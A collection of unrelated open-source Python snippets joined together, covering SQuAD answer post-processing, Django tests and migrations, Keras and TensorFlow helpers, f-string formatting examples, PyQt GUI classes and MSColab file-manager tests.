if pred.start_index > 0: # this is a non-null prediction
feature = features[pred.feature_index]
tok_tokens = feature.tokens[pred.start_index : (pred.end_index + 1)]
orig_doc_start = feature.token_to_orig_map[pred.start_index]
orig_doc_end = feature.token_to_orig_map[pred.end_index]
orig_tokens = example.doc_tokens[orig_doc_start : (orig_doc_end + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(
tok_text, orig_text, do_lower_case, verbose_logging
)
if final_text in seen_predictions:
continue
seen_predictions[final_text] = True
else:
final_text = ""
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred.start_logit,
end_logit=pred.end_logit,
)
)
# if we didn't include the empty option in the n-best, include it
if version_2_with_negative:
if "" not in seen_predictions:
nbest.append(
_NbestPrediction(
text="", start_logit=null_start_logit, end_logit=null_end_logit
)
)
# In very rare edge cases we could only have single null prediction.
# So we just create a nonce prediction in this case to avoid failure.
if len(nbest) == 1:
nbest.insert(
0, _NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0)
)
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
assert len(nbest) >= 1
total_scores = []
best_non_null_entry = None
for entry in nbest:
total_scores.append(entry.start_logit + entry.end_logit)
if not best_non_null_entry:
if entry.text:
best_non_null_entry = entry
probs = _compute_softmax(total_scores)
nbest_json = []
for (i, entry) in enumerate(nbest):
output = collections.OrderedDict()
output["text"] = entry.text
output["probability"] = probs[i]
output["start_logit"] = entry.start_logit
output["end_logit"] = entry.end_logit
nbest_json.append(output)
assert len(nbest_json) >= 1
if not version_2_with_negative:
all_predictions[example.qas_id] = nbest_json[0]["text"]
else:
# predict "" iff the null score - the score of best non-null > threshold
score_diff = (
score_null
- best_non_null_entry.start_logit
- (best_non_null_entry.end_logit)
)
scores_diff_json[example.qas_id] = score_diff
if score_diff > null_score_diff_threshold:
all_predictions[example.qas_id] = ""
else:
all_predictions[example.qas_id] = best_non_null_entry.text
all_nbest_json[example.qas_id] = nbest_json
with open(output_prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
with open(output_nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if version_2_with_negative:
with open(output_null_log_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
return all_predictions, all_nbest_json, scores_diff_json
def get_final_text(pred_text, orig_text, do_lower_case, verbose_logging=False):
"""Project the tokenized prediction back to the original text."""
# When we created the data, we kept track of the alignment between original
# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
# now `orig_text` contains the span of our original text corresponding to the
# span that we predicted.
#
# However, `orig_text` may contain extra characters that we don't want in
# our prediction.
#
# For example, let's say:
# pred_text = <NAME>
# orig_text = <NAME>
#
# We don't want to return `orig_text` because it contains the extra "'s".
#
# We don't want to return `pred_text` because it's already been normalized
# (the SQuAD eval script also does punctuation stripping/lower casing but
# our tokenizer does additional normalization like stripping accent
# characters).
#
# What we really want to return is "<NAME>".
#
# Therefore, we have to apply a semi-complicated alignment heuristic between
# `pred_text` and `orig_text` to get a character-to-character alignment. This
# can fail in certain cases in which case we just return `orig_text`.
def _strip_spaces(text):
ns_chars = []
ns_to_s_map = collections.OrderedDict()
for (i, c) in enumerate(text):
if c == " ":
continue
ns_to_s_map[len(ns_chars)] = i
ns_chars.append(c)
ns_text = "".join(ns_chars)
return (ns_text, ns_to_s_map)
# We first tokenize `orig_text`, strip whitespace from the result
# and `pred_text`, and check if they are the same length. If they are
# NOT the same length, the heuristic has failed. If they are the same
# length, we assume the characters are one-to-one aligned.
tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
tok_text = " ".join(tokenizer.tokenize(orig_text))
start_position = tok_text.find(pred_text)
if start_position == -1:
return orig_text
end_position = start_position + len(pred_text) - 1
(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
if len(orig_ns_text) != len(tok_ns_text):
return orig_text
# We then project the characters in `pred_text` back to `orig_text` using
# the character-to-character alignment.
tok_s_to_ns_map = {}
for (i, tok_index) in tok_ns_to_s_map.items():
tok_s_to_ns_map[tok_index] = i
orig_start_position = None
if start_position in tok_s_to_ns_map:
ns_start_position = tok_s_to_ns_map[start_position]
if ns_start_position in orig_ns_to_s_map:
orig_start_position = orig_ns_to_s_map[ns_start_position]
if orig_start_position is None:
return orig_text
orig_end_position = None
if end_position in tok_s_to_ns_map:
ns_end_position = tok_s_to_ns_map[end_position]
if ns_end_position in orig_ns_to_s_map:
orig_end_position = orig_ns_to_s_map[ns_end_position]
if orig_end_position is None:
return orig_text
output_text = orig_text[orig_start_position : (orig_end_position + 1)]
return output_text
def lcs(S, T):
m = len(S)
n = len(T)
counter = [[0] * (n + 1) for x in range(m + 1)]
longest = 0
lcs_set = set()
for i in range(m):
for j in range(n):
if S[i] == T[j]:
c = counter[i][j] + 1
counter[i + 1][j + 1] = c
if c > longest:
lcs_set = set()
longest = c
lcs_set.add(S[i - c + 1 : i + 1])
elif c == longest:
lcs_set.add(S[i - c + 1 : i + 1])
return lcs_set
def evaluate_results(text):
partial_match_scores = []
lcs_all = []
impos1, impos2, impos3, impos4 = 0, 0, 0, 0
pos1, pos2, pos3 = 0, 0, 0
fscores, squad_fscores = [], []
for i, key in enumerate(["correct_text", "similar_text", "incorrect_text"]):
for item in text[key]:
if i == 0:
if "impossible" in item and text[key][item]["predicted"] == "":
impos1 += 1
elif "span" in item:
pos1 += 1
fscores.append(1)
squad_fscores.append(1)
elif i == 1:
if "impossible" in item:
impos2 += 1
elif "span" in item:
z = text[key][item]
if z["predicted"] != "":
longest_match = list(lcs(z["truth"], z["predicted"]))[0]
lcs_all.append(longest_match)
partial_match_scores.append(
round(
len(longest_match.split()) / len(z["truth"].split()), 4
)
)
pos2 += 1
r = len(longest_match.split()) / len(z["truth"].split())
p = len(longest_match.split()) / len(z["predicted"].split())
f = 2 * p * r / (p + r)
fscores.append(f)
squad_fscores.append(compute_f1(z["truth"], z["predicted"]))
else:
pos3 += 1
impos4 += 1
fscores.append(0)
squad_fscores.append(0)
if i == 2:
if "impossible" in item:
impos3 += 1
elif "span" in item:
if z["predicted"] == "":
impos4 += 1
pos3 += 1
fscores.append(0)
squad_fscores.append(0)
total_pos = pos1 + pos2 + pos3
imr = impos2 / (impos2 + impos3)
imp = impos2 / (impos2 + impos4)
imf = 2 * imp * imr / (imp + imr)
p1 = "Postive Samples:"
p2 = "Exact Match: {}/{} = {}%".format(
pos1, total_pos, round(100 * pos1 / total_pos, 2)
)
p3 = "Partial Match: {}/{} = {}%".format(
pos2, total_pos, round(100 * pos2 / total_pos, 2)
)
p4a = "LCS F1 Score = {}%".format(round(100 * np.mean(fscores), 2))
p4b = "SQuAD F1 Score = {}%".format(round(100 * np.mean(squad_fscores), 2))
p5 = "No Match: {}/{} = {}%".format(
pos3, total_pos, round(100 * pos3 / total_pos, 2)
)
p6 = "\nNegative Samples"
p7 = "Inv F1 Score = {}%".format(round(100 * imf, 2))
# p7a = 'Inv Recall: {}/{} = {}%'.format(impos2, impos2+impos3, round(100*imr, 2))
# p7b = 'Inv Precision: {}/{} = {}%'.format(impos2, impos2+impos4, round(100*imp, 2))
p = "\n".join([p1, p2, p3, p4a, p4b, p5, p6, p7])
return p
| StarcoderdataPython |
6695429 | <reponame>cu-library/mellyn<filename>agreements/test_forms.py<gh_stars>0
"""
This module defines tests to run against the fields module.
https://docs.djangoproject.com/en/3.0/topics/testing/
"""
from datetime import datetime, timezone
from django.test import TestCase
from .forms import AgreementBaseForm
class AgreementBaseFormTestCase(TestCase):
"""Tests for the AgreementBaseForm."""
def test_agreementbaseform_clean(self):
"""Test that the end date can't be before the start date"""
form = AgreementBaseForm()
form.cleaned_data = {'start': datetime(1994, 6, 9, tzinfo=timezone.utc),
'end': datetime(1963, 6, 19, tzinfo=timezone.utc)}
form.clean()
self.assertIn('"End" date and time is before "Start" date and time.', form.non_field_errors())
form = AgreementBaseForm()
form.cleaned_data = {'start': datetime(1999, 12, 31, tzinfo=timezone.utc),
'end': datetime(2000, 1, 1, tzinfo=timezone.utc)}
form.clean()
self.assertNotIn('"End" date and time is before "Start" date and time.', form.non_field_errors())
form = AgreementBaseForm()
form.cleaned_data = {'start': datetime(1999, 12, 31, tzinfo=timezone.utc),
'end': None}
form.clean()
self.assertNotIn('"End" date and time is before "Start" date and time.', form.non_field_errors())
| StarcoderdataPython |
158464 | import unittest
from kbmodpy import kbmod as kb
class test_import(unittest.TestCase):
def setUp(self):
#kb.
pass
def test_something(self):
#self.assertGreater( a , b )
#self.assertEqual( a , b )
pass
| StarcoderdataPython |
20804 | # encoding: utf8
import numpy as np
import pandas as pd
from collections import OrderedDict
from senti_analysis import config
from senti_analysis import constants
from senti_analysis.preprocess import (load_tokenizer, load_sentences,
encode_sentence, label_transform)
def load_data_set():
"""
Load data set.
:return: train_data_set, validation_data_set, test_data_set
"""
train_data_set = pd.read_csv(config.TRAIN_SET_PATH)
validation_data_set = pd.read_csv(config.VALIDATION_SET_PATH)
test_data_set = pd.read_csv(config.TEST_SET_PATH)
return train_data_set, validation_data_set, test_data_set
def x_data():
train_set = pd.read_csv(config.TRAIN_SET_PATH)
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
tokenizer = load_tokenizer()
train_sentences, val_sentences, test_sentences = load_sentences()
x_train = encode_sentence(train_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
tokenizer=tokenizer)
x_val = encode_sentence(val_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
tokenizer=tokenizer)
return x_train, x_val
def load_val_data_set():
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
tokenizer = load_tokenizer()
train_sentences, val_sentences, test_sentences = load_sentences()
x_val = encode_sentence(val_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
tokenizer=tokenizer)
train_set = pd.read_csv(config.TRAIN_SET_PATH)
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
_, y_val = transform_y_data(train_set, val_set, constants.COLS)
return x_val, y_val
def transform_y_data(train_set, val_set, cols):
y_train = OrderedDict()
y_val = OrderedDict()
for col in cols:
y_train[col] = np.array(label_transform(train_set[col]))
y_val[col] = np.array(label_transform(val_set[col]))
return y_train, y_val
def y_data():
"""
generate y label data.
:return: train_label_data dict, validation_label_data dict
"""
train_set = pd.read_csv(config.TRAIN_SET_PATH)
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
y_train, y_val = transform_y_data(train_set, val_set, constants.COLS)
return y_train, y_val
def validate_data():
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
tokenizer = load_tokenizer()
train_sentences, val_sentences, test_sentences = load_sentences()
x_val = encode_sentence(val_sentences, padding=True,
max_length=config.MAX_SEQUENCE_LENGTH, tokenizer=tokenizer)
y_val = {}
for col in constants.COLS:
y_val[col] = np.array(label_transform(val_set[col]))
return x_val, y_val
| StarcoderdataPython |
1733354 | <filename>src/utils/models.py
import tensorflow as tf
import os
import logging
def get_VGG_16_model(input_shape, model_path):
model = tf.keras.applications.vgg16.VGG16(
input_shape = input_shape,
weights = "imagenet",
include_top = False
)
model.save(model_path)
logging.info(f"VGG16 base model saved at: {model_path} ")
return model
def prepare_model(model, CLASSES, freeze_all, freeze_till,learning_rate):
if freeze_all:
for layer in model.layers:
layer.trainable = False
elif (freeze_till is not None) and (freeze_till>1):
for layer in model.layers[:-freeze_till]:
layer.trainable = False
##add our full connected layers
flatten_in =tf.keras.layers.Flatten()(model.output)
prediction= tf.keras.layers.Dense(
units=CLASSES,
activation="softmax"
)(flatten_in)
full_model=tf.keras.models.Model(
inputs=model.input,
outputs=prediction
)
full_model.compile(
optimizer= tf.keras.optimizers.SGD(learning_rate=learning_rate),
loss=tf.keras.losses.CategoricalCrossentropy(),
metrics= ["accuracy"]
)
logging.info("custom model is compiled and ready to be trained")
full_model.summary()
return model | StarcoderdataPython |
5185255 | a = 123
b = 'abc'
print('{} and {}'.format(a, b))
# 123 and abc
print('{first} and {second}'.format(first=a, second=b))
# 123 and abc
print(f'{a} and {b}')
# 123 and abc
print(F'{a} and {b}')
# 123 and abc
print(f"{a} and {b}")
# 123 and abc
print(f'''{a} and {b}''')
# 123 and abc
print(f"""{a} and {b}""")
# 123 and abc
s = 'abc'
print(f'right : {s:_>8}')
print(f'center: {s:_^8}')
print(f'left : {s:_<8}')
# right : _____abc
# center: __abc___
# left : abc_____
i = 1234
print(f'zero padding: {i:08}')
# zero padding: 00001234
print(f'comma: {i:,}')
# comma: 1,234
print(f'bin: {i:b}')
print(f'oct: {i:o}')
print(f'hex: {i:x}')
# bin: 10011010010
# oct: 2322
# hex: 4d2
print(f'bin: {i:#b}')
print(f'oct: {i:#o}')
print(f'hex: {i:#x}')
# bin: 0b10011010010
# oct: 0o2322
# hex: 0x4d2
f = 12.3456
print(f'digit(decimal): {f:.3f}')
print(f'digit(all) : {f:.3g}')
# digit(decimal): 12.346
# digit(all) : 12.3
print(f'exponent: {f:.3e}')
# exponent: 1.235e+01
f = 0.123
print(f'percent: {f:.2%}')
# percent: 12.30%
n = 123
print(f'{{}}-{n}-{{{n}}}')
# {}-123-{123}
n = 123
i = 8
print('{n:0{i}}'.format(n=n, i=i))
# 00000123
print(f'{n:0{i}}')
# 00000123
f = 1.2345
for i in range(5):
print(f'{f:.{i}f}')
# 1
# 1.2
# 1.23
# 1.234
# 1.2345
print('x\ty')
# x y
print(r'x\ty')
# x\ty
x = 'XXX'
y = 'YYY'
print(f'{x}\t{y}')
# XXX YYY
print(rf'{x}\t{y}')
# XXX\tYYY
print(fr'{x}\t{y}')
# XXX\tYYY
a = 3
b = 4
# print('{a} + {b} = {a + b}'.format(a=a, b=b))
# KeyError: 'a + b'
print(f'{a} + {b} = {a + b}')
# 3 + 4 = 7
print(f'{a} * {b} = {a * b}')
# 3 * 4 = 12
print(f'{a} / {b} = {a / b:.2e}')
# 3 / 4 = 7.50e-01
d = {'key1': 3, 'key2': 4}
print('{0[key1]}, {0[key2]}'.format(d))
# 3, 4
# print('{0["key1"]}, {0["key2"]}'.format(d))
# KeyError: '"key1"'
print(f'{d["key1"]}, {d["key2"]}')
# 3, 4
# print(f'{d[key1]}, {d[key2]}')
# NameError: name 'key1' is not defined
# print(f'{d['key1']}, {d['key2']}')
# SyntaxError: invalid syntax
print(f"{d['key1']}, {d['key2']}")
# 3, 4
# print(f'{d[\'key1\']}, {d[\'key2\']}')
# SyntaxError: f-string expression part cannot include a backslash
i = 123
print(f'{i=}')
# i=123
print(f'{i = }')
# i = 123
print(f'{ i = }')
# i = 123
print(f'{i = :#b}')
# i = 0b1111011
print(f'{i * 2 = }')
# i * 2 = 246
l = [0, 1, 2]
print(f'{l = }, {l[0] = }')
# l = [0, 1, 2], l[0] = 0
d = {'key1': 3, 'key2': 4}
print(f'{d = }, {d["key1"] = }')
# d = {'key1': 3, 'key2': 4}, d["key1"] = 3
| StarcoderdataPython |
250745 | ## CA
from Load_config_GUI import Ui_Load
from Adv_params_GUI import Ui_Adv_Params
class Ui_CA(object):
def load_folder_name(self):
"""
Initializes the 'Load config file' window
Returns
------
string : the loaded filename
"""
self.window = QtWidgets.QWidget()
self.Load = Ui_Load()
return self.Load.setupUi_save(self.window)
def AP_window(self):
"""
Initializes the 'Advanced parameters' window
Returns
------
AP : the Ui_Adv_Params object
window : QtWidgets.QMainWindow object
"""
self.window = QtWidgets.QMainWindow()
self.AP = Ui_Adv_Params()
self.AP.setupUi(self.window)
self.window.show()
return self.AP,self.window
## CV
from Load_config_GUI import Ui_Load # more
from Adv_params_GUI import Ui_Adv_Params
class Ui_CV(object):
"""
Initializes the 'Load config file' window
Returns
------
string : the loaded filename
"""
def load_folder_name(self):
self.window = QtWidgets.QWidget()
self.Load = Ui_Load()
return self.Load.setupUi_save(self.window)
def AP_window(self):
"""
Initializes the 'Advanced parameters' window
Returns
------
AP : the Ui_Adv_Params object
window : QtWidgets.QMainWindow object
"""
self.window = QtWidgets.QMainWindow()
self.AP = Ui_Adv_Params()
self.AP.setupUi(self.window)
self.window.show()
return self.AP,self.window
## LSV
class Ui_LSV(object):
def load_folder_name(self):
"""
Initializes the 'Load config file' window
Returns
------
string : the loaded filename
"""
self.window = QtWidgets.QWidget()
self.Load = Ui_Load()
return self.Load.setupUi_save(self.window)
def AP_window(self):
"""
Initializes the 'Advanced parameters' window
Returns
------
AP : the Ui_Adv_Params object
window : QtWidgets.QMainWindow object
"""
self.window = QtWidgets.QMainWindow()
self.AP = Ui_Adv_Params()
self.AP.setupUi(self.window)
self.window.show()
return self.AP,self.window
## main
from LSV_GUI import Ui_LSV
from CV_GUI import Ui_CV
from CA_GUI import Ui_CA
from Load_config_GUI import Ui_Load
from Exp_type_GUI import Ui_Experiment
class Ui_MainWindow(object):
def show_exp(self):
"""
Initializes the 'Experiment Type' window
Returns
------
exp: the Ui_Experiment object
"""
self.window = QtWidgets.QDialog()
self.exp = Ui_Experiment()
self.exp.setupUi(self.window)
self.window.show()
return self.exp
def show_LSVwindow(self):
"""
Initializes the 'LSV' window
Returns
------
LSV: the Ui_LSV object
window : the LSV QMainWindow object
"""
self.window = QtWidgets.QMainWindow()
self.LSV = Ui_LSV()
self.LSV.setupUi(self.window)
self.window.show()
return self.LSV,self.window
def show_CVwindow(self):
"""
Initializes the 'CV' window
Returns
------
CV: the Ui_CV object
window : the CV QMainWindow object
"""
self.window = QtWidgets.QMainWindow()
self.CV = Ui_CV()
self.CV.setupUi(self.window)
self.window.show()
return self.CV,self.window
def show_CAwindow(self):
"""
Initializes the 'CA' window
Returns
------
CA: the Ui_CA object
window : the CA QMainWindow object
"""
self.window = QtWidgets.QMainWindow()
self.CA = Ui_CA()
self.CA.setupUi(self.window)
self.window.show()
return self.CA,self.window
def load_config(self):
"""
Initializes the 'Load config file' window
Returns
------
string: the loaded filename
"""
self.window = QtWidgets.QWidget()
self.Load = Ui_Load()
return self.Load.setupUi(self.window) | StarcoderdataPython |
8054637 | from modeltranslation.translator import translator, TranslationOptions
from events.models import Category, EventTemplate
class CategoryTranslationOptions(TranslationOptions):
fields = ('description', 'name',)
class EventTemplateTranslationOptions(TranslationOptions):
fields = ('description', 'name',)
translator.register(Category, CategoryTranslationOptions)
translator.register(EventTemplate, EventTemplateTranslationOptions) | StarcoderdataPython |
4998187 | <reponame>leonoravesterbacka/excursion<gh_stars>1-10
# test_initialize_excursion.py
import torch
import yaml
from excursion import init_gp, ExcursionSetEstimator
from excursion.utils import load_example
def test_init_excursion():
device = torch.device("cpu")
ninit = 1
algorithmopts = yaml.safe_load(open("testing/algorithm_specs.yaml", "r"))
# three toy examples
for example in ["1Dtoyanalysis", "2Dtoyanalysis", "3Dtoyanalysis"]:
testcase = load_example(example)
gp, likelihood = init_gp(testcase, algorithmopts, ninit, device)
estimator = ExcursionSetEstimator(
testcase, algorithmopts, gp, likelihood, device
)
assert type(estimator) != type(None)
assert type(estimator._X_grid) != type(None)
assert type(estimator._n_dims) != type(None)
assert type(estimator._acq_type) != type(None)
| StarcoderdataPython |
3371858 | <gh_stars>10-100
'''
Problem Description
Given an integer array A of size N.
You can pick B elements from either left or right end of the array A to get maximum sum.
Find and return this maximum possible sum.
NOTE: Suppose B = 4 and array A contains 10 elements then
You can pick first four elements or can pick last four elements or can pick 1 from front and 3 from back etc .
you need to return the maximum possible sum of elements you can pick.
'''
class Solution:
# @param A : list of integers
# @param B : integer
# @return an integer
def solve(self, A, B):
mx_sum = sum(A[:B])
temp_a = A[:B]
mx = mx_sum
for i in range(0, B):
mx_sum = mx_sum - temp_a.pop() + A.pop()
mx = max(mx_sum, mx)
return mx
| StarcoderdataPython |
5052578 | <reponame>sedatozturke/swe-573-2020f
# Generated by Django 3.1.5 on 2021-01-12 16:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('explore', '0003_auto_20210112_1931'),
]
operations = [
migrations.RemoveField(
model_name='subreddit',
name='annotations',
),
migrations.RemoveField(
model_name='subreddit',
name='mentions',
),
]
| StarcoderdataPython |
6418929 | <filename>aago_ranking/games/migrations/0001_initial.py<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-06-18 00:53
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('date', models.DateField(db_index=True)),
],
options={
'verbose_name': 'game',
'verbose_name_plural': 'games',
},
),
migrations.CreateModel(
name='Player',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='game',
name='white_player',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='games.Player'),
),
]
| StarcoderdataPython |
3516530 | <gh_stars>10-100
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
# Copyright 2019 The BERT-QA Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gaussian error linear unit."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
def gelu(x):
"""Gaussian Error Linear Unit.
This is a smoother version of the RELU.
Original paper: https://arxiv.org/abs/1606.08415
Args:
x: float Tensor to perform activation.
Returns:
`x` with the GELU activation applied.
"""
cdf = 0.5 * (1.0 + tf.tanh(
(math.sqrt(2 / math.pi) * (x + 0.044715 * tf.pow(x, 3)))))
return x * cdf
"""Customized Swish activation."""
def simple_swish(features):
"""Computes the Swish activation function.
The tf.nn.swish operation uses a custom gradient to reduce memory usage.
Since saving custom gradients in SavedModel is currently not supported, and
one would not be able to use an exported TF-Hub module for fine-tuning, we
provide this wrapper that can allow to select whether to use the native
TensorFlow swish operation, or whether to use a customized operation that
has uses default TensorFlow gradient computation.
Args:
features: A `Tensor` representing preactivation values.
Returns:
The activation value.
"""
features = tf.convert_to_tensor(features)
return features * tf.nn.sigmoid(features)
def hard_swish(features):
"""Computes a hard version of the swish function.
This operation can be used to reduce computational cost and improve
quantization for edge devices.
Args:
features: A `Tensor` representing preactivation values.
Returns:
The activation value.
"""
features = tf.convert_to_tensor(features)
return features * tf.nn.relu6(features + tf.constant(3.)) * (1. / 6.)
def identity(features):
"""Computes the identity function.
Useful for helping in quantization.
Args:
features: A `Tensor` representing preactivation values.
Returns:
The activation value.
"""
features = tf.convert_to_tensor(features)
return tf.identity(features) | StarcoderdataPython |
9730751 | def test_save_known_data():
pass
def test_save_unknown_data():
pass
| StarcoderdataPython |
11362376 | #!/usr/bin/env python
from enum import Enum
class ServerType(Enum):
ZOOKEEPER = 1
KAFKA = 2
SCHEMA_REGISTRY = 3
KAFKA_CONNECT = 4
REPLICATOR = 5
KAFKA_REST = 6
KSQLDB = 7
CONTROL_CENTER = 8
ANY = 9
NONE = 10
| StarcoderdataPython |
1709946 | # -*- coding: utf-8 -*-
"""
mslib.mscolab._tests.test_file_manager
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
tests for file_manager functionalities
This file is part of mss.
:copyright: Copyright 2020 <NAME>
:copyright: Copyright 2020-2021 by the mss team, see AUTHORS.
:license: APACHE-2.0, see LICENSE for details.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from flask_testing import TestCase
import os
import pytest
from mslib.mscolab.conf import mscolab_settings
from mslib.mscolab.models import Operation, db
from mslib.mscolab.server import APP
from mslib.mscolab.file_manager import FileManager
from mslib.mscolab.seed import add_user, get_user
from mslib.mscolab.mscolab import handle_db_reset
@pytest.mark.skipif(os.name == "nt",
reason="multiprocessing needs currently start_method fork")
class Test_FileManager(TestCase):
render_templates = False
def create_app(self):
app = APP
app.config['SQLALCHEMY_DATABASE_URI'] = mscolab_settings.SQLALCHEMY_DB_URI
app.config['MSCOLAB_DATA_DIR'] = mscolab_settings.MSCOLAB_DATA_DIR
app.config['UPLOAD_FOLDER'] = mscolab_settings.UPLOAD_FOLDER
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config["TESTING"] = True
app.config['LIVESERVER_TIMEOUT'] = 10
app.config['LIVESERVER_PORT'] = 0
return app
def setUp(self):
handle_db_reset()
db.init_app(self.app)
self.userdata = 'UV10@uv10', 'UV10', 'uv10'
self.anotheruserdata = 'UV20@uv20', 'UV20', 'uv20'
self.fm = FileManager(self.app.config["MSCOLAB_DATA_DIR"])
self.userdata = 'UV10@uv10', 'UV10', 'uv10'
assert add_user(self.userdata[0], self.userdata[1], self.userdata[2])
self.user = get_user(self.userdata[0])
assert self.user is not None
assert add_user(self.anotheruserdata[0], self.anotheruserdata[1], self.anotheruserdata[2])
self.anotheruser = get_user(self.anotheruserdata[0])
assert add_user('UV30@uv30', 'UV30', 'uv30')
self.vieweruser = get_user('UV30@uv30')
assert add_user('UV40@uv40', 'UV40', 'uv40')
self.collaboratoruser = get_user('UV40@uv40')
self._example_data()
def tearDown(self):
pass
def test_create_operation(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="famous")
assert operation.path == flight_path
assert self.fm.create_operation(flight_path, "something to know", self.user) is False
flight_path, operation = self._create_operation(flight_path="example_flight_path", content=self.content1)
assert operation.path == flight_path
def test_get_operation_details(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='operation2')
pd = self.fm.get_operation_details(operation.id, self.user)
assert pd['description'] == operation.description
assert pd['path'] == operation.path
assert pd['id'] == operation.id
def test_list_operations(self):
with self.app.test_client():
self.fm.create_operation("first", "info about first", self.user)
self.fm.create_operation("second", "info about second", self.user)
expected_result = [{'access_level': 'creator',
'category': 'default',
'description': 'info about first',
'op_id': 1,
'path': 'first'},
{'access_level': 'creator',
'category': 'default',
'description': 'info about second',
'op_id': 2,
'path': 'second'}]
assert self.fm.list_operations(self.user) == expected_result
def test_is_admin(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='third')
assert self.fm.is_admin(self.user.id, operation.id)
def test_is_collaborator(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='fourth')
assert self.anotheruser.id is not None
self.fm.add_bulk_permission(operation.id, self.user, [self.anotheruser.id], "collaborator")
assert self.fm.is_collaborator(self.anotheruser.id, operation.id)
def test_auth_type(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="aa")
assert self.fm.auth_type(self.user.id, operation.id) != "collaborator"
assert self.fm.auth_type(self.user.id, operation.id) == "creator"
def test_update_operation(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='operation3')
rename_to = "operation03"
self.fm.update_operation(operation.id, "path", rename_to, self.user)
ren_operation = Operation.query.filter_by(path=rename_to).first()
assert ren_operation.id == operation.id
assert ren_operation.path == rename_to
def test_delete_file(self):
# Todo rename "file" to operation
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='operation4')
assert self.fm.delete_file(operation.id, self.user)
assert Operation.query.filter_by(path=flight_path).first() is None
def test_get_authorized_users(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='operation5')
assert self.fm.get_authorized_users(operation.id) == [{'access_level': 'creator',
'username': self.userdata[1]}]
def test_save_file(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation6", content=self.content1)
# nothing changed
assert self.fm.save_file(operation.id, self.content1, self.user) is False
assert self.fm.save_file(operation.id, self.content2, self.user)
def test_get_file(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation7")
assert self.fm.get_file(operation.id, self.user).startswith('<?xml version="1.0" encoding="utf-8"?>')
def test_get_all_changes(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation8")
assert self.fm.get_all_changes(operation.id, self.user) == []
assert self.fm.save_file(operation.id, self.content1, self.user)
assert self.fm.save_file(operation.id, self.content2, self.user)
changes = self.fm.get_all_changes(operation.id, self.user)
assert len(changes) == 2
def test_get_change_content(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation8")
assert self.fm.get_all_changes(operation.id, self.user) == []
assert self.fm.save_file(operation.id, self.content1, self.user)
assert self.fm.save_file(operation.id, self.content2, self.user)
all_changes = self.fm.get_all_changes(operation.id, self.user)
